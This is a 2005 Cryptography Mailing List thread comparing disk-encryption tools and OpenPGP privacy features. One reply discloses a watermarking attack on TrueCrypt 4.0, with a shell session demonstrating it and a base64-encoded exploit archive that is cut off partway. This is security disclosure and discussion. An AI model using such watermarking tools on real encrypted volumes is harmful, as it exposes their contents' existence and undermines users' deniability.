Re: gonzo cryptography; how would you improve existing cryptosystems?
On Thu, 17 Nov 2005, Jari Ruusu wrote: Unfortunately truecrypt is just another broken device crypto implementation that uses good ciphers in insecure way. Specially crafted static bit patterns are easily detectable through that kind of bad crypto. Looks like they have fixed it: version 4.1 (2005-11-25) supports tweakable narrow-block encryption (LRW). -- Regards, ASK - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
Thomas Sjögren wrote: On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote: The only thing close that I've seen is Bestcrypt, which is commercial and has a Linux and Windows port. I don't recall if the Linux port came with source or not. http://www.truecrypt.org/ TrueCrypt Free open-source disk encryption software for Windows XP/2000/2003 and Linux Unfortunately truecrypt is just another broken device crypto implementation that uses good ciphers in insecure way. Specially crafted static bit patterns are easily detectable through that kind of bad crypto. Requirements: (1) used ciphers must have 128-bit block size and (2) file system where bit patterns are stored must have 2K or larger soft block size. Many popular linux file systems meet those requirements. Uuencoded exploit source code is included in this email. # truecrypt --device-number 0 --filesystem ext2 /tmp/container1.tc /mnt Enter password for '/tmp/container1.tc': # mount | grep /mnt /dev/mapper/truecrypt0 on /mnt type ext2 (rw) # tune2fs -l /dev/mapper/truecrypt0 | grep Block size Block size: 4096 # ./create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 /mnt/foo1 # truecrypt -d /mnt # truecrypt -l truecrypt: Kernel module not loaded # ./detect-watermark-encodings-truecrypt /tmp/container1.tc 5241344 bytes scanned watermark encoding 10, count 44 watermark encoding 11, count 55 watermark encoding 12, count 66 watermark encoding 666, count 77 # uname -s -r Linux 2.6.14.2 # truecrypt --version | head -n 1 truecrypt 4.0 -- Jari Ruusu 1024R/3A220F51 5B 4B F9 BB D3 3F 52 E9 DB 1D EB E3 24 0E A9 DD begin-base64 644 watermark-exploits.tar.bz2 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
Re: gonzo cryptography; how would you improve existing cryptosystems?
On 4 Nov 2005, at 5:23 PM, Travis H. wrote: For example, pgp doesn't hide the key IDs of the addressees. But OpenPGP does. Here's an extract fro RFC 2440: 5.1. Public-Key Encrypted Session Key Packets (Tag 1) [...] An implementation MAY accept or use a Key ID of zero as a wild card or speculative Key ID. In this case, the receiving implementation would try all available private keys, checking for a valid decrypted session key. This format helps reduce traffic analysis of messages. Now, there has been much discussion about how useful this is, and there are other related issues like how you do the UI for such a thing. But the *protocol* handles it. You might also want to look at the PFS extensions for OpenPGP: http://www.apache-ssl.org/openpgp-pfs.txt and even OTR, which is very cool in its own right (and is designed to take care of the sort of edge conditions all of these other things have): http://www.cypherpunks.ca/otr/ Jon - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Fri, 4 Nov 2005, Travis H. wrote: PS: There's a paper on cryptanalyzing CFS on my homepage below. I got to successfully use classical cryptanalysis on a relatively modern system! That is a rare joy. CFS really needs a re-write, there's no real good alternatives for cross-platform filesystem encryption to my knowledge. On Mon, 7 Nov 2005, Jason Holt wrote: Take a look at ecryptfs before rewriting cfs: http://sourceforge.net/projects/ecryptfs Nice, but linux-only and requires special kernel support. cfs supports lots and lots of different OSs and doesn't require kernel modes. So far as I know, in this regard cfs is unique among cryptographic filesystems. ciao, -- -- Jonathan Thornburg [EMAIL PROTECTED] Max-Planck-Institut fuer Gravitationsphysik (Albert-Einstein-Institut), Golm, Germany, Old Europe http://www.aei.mpg.de/~jthorn/home.html Washing one's hands of the conflict between the powerful and the powerless means to side with the powerful, not to be neutral. -- quote by Freire / poster by Oxfam - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
Nice, but linux-only and requires special kernel support. cfs supports lots and lots of different OSs and doesn't require kernel modes. So far as I know, in this regard cfs is unique among cryptographic filesystems. The only thing close that I've seen is Bestcrypt, which is commercial and has a Linux and Windows port. I don't recall if the Linux port came with source or not. I had problems with the init script hanging the boot process, or at least delaying it significantly, so I uninstalled it until I could devote the time to analyze what was going on. Right after installation I tried using it to read a container copied from a corrupted Windows machine, but was not successful. It is unclear to me if this was due to the corruption which occured, or some kind of incompatibility between the Windows and Linux ports. -- http://www.lightconsulting.com/~travis/ -- We already have enough fast, insecure systems. -- Schneier Ferguson GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Mon, 7 Nov 2005, Jason Holt wrote: Take a look at ecryptfs before rewriting cfs ... or at TrueCrypt (which works on linux and windows): http://www.truecrypt.org/downloads.php -- Regards, ASK - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote: The only thing close that I've seen is Bestcrypt, which is commercial and has a Linux and Windows port. I don't recall if the Linux port came with source or not. http://www.truecrypt.org/ TrueCrypt Free open-source disk encryption software for Windows XP/2000/2003 and Linux Main Features: * It can create a virtual encrypted disk within a file and mount it as a real disk. * It can encrypt an entire hard disk partition or a device, such as USB memory stick, floppy disk, etc. * Provides two levels of plausible deniability, in case an adversary forces you to reveal the password: 1) Hidden volume (more information may be found here). 2) No TrueCrypt volume can be identified (TrueCrypt volumes cannot be distinguished from random data). * Encryption algorithms: AES-256, Blowfish (448-bit key), CAST5, Serpent (256-bit key), Triple DES, and Twofish (256-bit key). Supports cascading (e.g., AES-Twofish-Serpent). * Based on Encryption for the Masses (E4M) 2.02a, which was conceived in 1997. Further information regarding the features of the software may be found in the documentation. Complete source code (in C) of the latest stable version of TrueCrypt for all supported operating systems and all supported hardware platforms are available from http://www.truecrypt.org/downloads.php /Thomas -- signature.asc Description: Digital signature
Re: gonzo cryptography; how would you improve existing cryptosystems?
Does ISAKMP do encryption where the input is meant to be secret, instead of the key? I meant MAC, not encryption, sorry. Of course encryption inputs are secret. -- http://www.lightconsulting.com/~travis/ -- We already have enough fast, insecure systems. -- Schneier Ferguson GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
On Fri, 4 Nov 2005, Travis H. wrote: PS: There's a paper on cryptanalyzing CFS on my homepage below. I got to successfully use classical cryptanalysis on a relatively modern system! That is a rare joy. CFS really needs a re-write, there's no real good alternatives for cross-platform filesystem encryption to my knowledge. Take a look at ecryptfs before rewriting cfs: http://sourceforge.net/projects/ecryptfs -J - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]